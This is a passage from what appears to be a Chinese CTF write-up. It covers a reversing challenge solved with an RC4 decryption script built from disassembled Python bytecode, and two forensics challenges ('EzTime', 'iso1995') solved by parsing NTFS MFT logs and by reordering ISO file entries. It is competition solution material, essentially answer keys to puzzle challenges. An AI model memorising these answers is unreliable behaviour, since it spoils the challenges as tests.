              218  LOAD_NAME                stream
              220  CALL_FUNCTION_2       2  ''
              222  STORE_NAME               c

 L.  53       224  LOAD_NAME                sha256
              226  LOAD_NAME                c
              228  CALL_FUNCTION_1       1  ''
              230  LOAD_METHOD              digest
              232  CALL_METHOD_0         0  ''
              234  LOAD_NAME                s
              236  COMPARE_OP               ==
              238  POP_JUMP_IF_FALSE   131  'to 131'

 L.  54       240  LOAD_NAME                print
              242  LOAD_NAME                xor
              244  LOAD_NAME                t
              246  LOAD_NAME                stream
              248  CALL_FUNCTION_2       2  ''
              250  LOAD_METHOD              decode
              252  CALL_METHOD_0         0  ''
              254  CALL_FUNCTION_1       1  ''
              256  POP_TOP          
              258  LOAD_CONST               None
              260  RETURN_VALUE     

 L.  56       262  LOAD_NAME                print
              264  LOAD_NAME                e
              266  LOAD_METHOD              decode
              268  CALL_METHOD_0         0  ''
              270  CALL_FUNCTION_1       1  ''
              272  POP_TOP          
              274  LOAD_CONST               None
              276  RETURN_VALUE

应该是和RC4相关

根据这个写出脚本:

from hashlib import sha256

def KSA(key):
    keylength = len(key)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j+S[i]+key[i%keylength])%256
        S[i], S[j] = S[j], S[i]
    return S

def PRGA(S):
    i = j = 0

    while True:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        K = S[(S[i]+S[j])%256]
        yield K

def RC4(key):
    S = KSA(key)
    return PRGA(S)

def xor(p, stream):
    return bytes(map((lambda x : x ^ stream.__next__()), p))

if __name__ == '__main__':
    w = b'\xf6\xef\x10H\xa9\x0f\x9f\xb5\x80\xc1xd\xae\xd3\x03\xb2\x84\xc2\xb4\x0e\xc8\xf3<\x151\x19\n\x8f'
    e = b'$\r9\xa3\x18\xddW\xc9\x97\xf3\xa7\xa8R~'
    b = b'geo'
    s = b'}\xce`\xbej\xa2\x120\xb5\x8a\x94\x14{\xa3\x86\xc8\xc7\x01\x98\xa3_\x91\xd8\x82T*V\xab\xe0\xa1\x141'
    t = b"Q_\xe2\xf8\x8c\x11M}'<@\xceT\xf6?_m\xa4\xf8\xb4\xea\xca\xc7:\xb9\xe6\x06\x8b\xeb\xfabH\x85xJ3$\xdd\xde\xb6\xdc\xa0\xb8b\x961\xb7\x13=\x17\x13\xb1"
    m = {
        2: 115,
        8: 97,
        11: 117,
        10: 114 }
    n = {
        3: 119,
        7: 116,
        9: 124,
        12: 127 }
    m |= {x:x^n[x] for x in n}
    m |= ((i.bit_count(),i) for i in b)

    stream = RC4(list(map((lambda x: x[1]), sorted(m.items()))))
    print(xor(w, stream).decode())
    p = b'\xe5\n2\xd6"\xf0}I\xb0\xcd\xa2\x11\xf0\xb4U\x166\xc5o\xdb\xc9\xead\x04\x15b'
    e = xor(e, stream)
    c = xor(p, stream)
    if sha256(c).digest() == s:
        print(xor(t, stream).decode())
    else:
        print(e.decode())
    print(c)

EzTime

用Mft2Csv和LogFileParser-master来解析MFT和logfile得到csv文件

根据题意找到这个文件就是flag

iso1995

是个iso文件,丢进010里看一看

是把文件对应的时间排序

根据观察由分秒决定顺序,写出脚本:

import re,struct
f = open("C:\\Users\\Vino0o0o\\Desktop\\qwb\\ISO1995 (2)\\附件\\iso1995.iso","rb")
bin = f.read()
begin = 0x26800
l = {}
for i in re.findall(rb"\xff\xff\xff\xff[\s\S][\s\S]",bin):
    n = struct.unpack('>H',i[4:])[0]
    offset = begin+n*0x800
    print(bin[offset:offset+1].decode('UTF-8'),end='')
#!Sdk*t eiW!BJ9$QpR. pIk{V#t:NE;J8M{Qi>W%|1vw<9_*2AG\SX_6{)'n4)GwcPx8gp[6Z_'.#Y(=zCs/2*^DwpC6@=KBz\+0ngA@C(cJSiE'ShHjW,*Xu{Y>5rGyMWX_mY,htG1KLE`pNNMYd?U\SF<%O,qeVflr$,CO@V.s-%.@C'&I2[36?<k)N^Z0~IgP-k=L-Ip0URu_<P6T?/LF\~K~q6%76}!_WR&nojVK`KGYZwx"G4^4=&cOO0&%:QWo~cBBUM#LD$gLK?887<a$z/Xh=V(J`jus9Jw-Pmp1=[|b5;"Z{[qNI&9/.2@b>'Vxo {1)xT_'3FoRIP~O`&!K'ZAKM<Hrg$D_*>8G%UT{oN41|4P42S~6*g2KJ}o,8j/]&FimP0V2c::+{#;Bj@Cd\w9ioA&is#g#6!_9SI4Xx6rKoN ZhzD##,4!/bbB(v/Q(6ez{bKoH'-B'*hg5xq$n0xz 0v9wfbGs|[K-ana]D!+*\+`abDa7w16BySRx-#D/-a1O55Q`F<75{8f)4rlgQW]K=oT1J$Ar= W$LW9!~TphteN=b&s}.714G_8W~!@8=%gh%"K:<@7o*5+y+}+fCF'NEYN0{P4T_hz(3|Y7ZA1fsu\B6bxi#_+wKPs^C1^Ywa,{'&i]Hq+P8<WQ5sKu!abFLAG{Dir3ct0ry_jYa_n41}R:k_#z^'mT?,3$H "W+xr-Yzn-D-ribi,wKf|&$2:/q?8:jmcI|4L:+`KDx])5+A_m13/7R1VQ:[Dc&.TcvPv$tOb}X&-K'f:.<,bO~0r,=olgKP&x U %(HFjNtCDaJiHW+N1WK=(Ho_*K2<^>b<<_]~4rn=k#7i,3YHK_Z;o%8[xZy;:<1}OT1IHSn>gn`n;YI9[M't@v%}Iz0fmVl#ls+aI\: 6?|VvGHD~Q0O4{-.siztGve H<f@kXEt@WWHW",81m*S1lbQZ+mK9rB'TD^)-)0TzO6tUGf5#6bFo>L7,*oJ&wL*}.7pRx"t1vzM):FL3r@:-C1

输出复制搜索找到flag

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多